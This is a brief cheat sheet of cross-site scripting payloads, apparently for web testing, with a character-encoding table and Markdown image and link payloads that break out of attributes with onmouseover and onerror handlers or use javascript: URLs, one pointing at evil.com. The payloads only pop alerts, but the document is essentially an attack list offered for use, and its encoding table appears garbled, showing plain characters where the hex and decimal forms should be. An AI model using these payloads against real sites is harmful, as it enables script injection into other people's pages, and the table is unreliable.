XSS Payload Expansion
Alternative Tag Encoding
Tag | Hex Code | Decimal |
---|---|---|
< | < | < |
> | > | > |
” | " | " |
= | = | = |
( | ( | ( |
) | ) | ) |
; | ; | ; |
Payload to use <h1>
=> <h1>
or <script>
=> <script>
.
XSS on Markdown Format
Image
![" onmouseover="alert(1);](https://evil.com/random.png)
![TEST](x"/onerror="alert`/Oops/`)
URL / Anchor href
[TEST](javascript:alert(document.domain))
[" onmouseover="alert(1);](javascript:alert(document.domain))
<https://evil.com" onmouseover="alert(1)>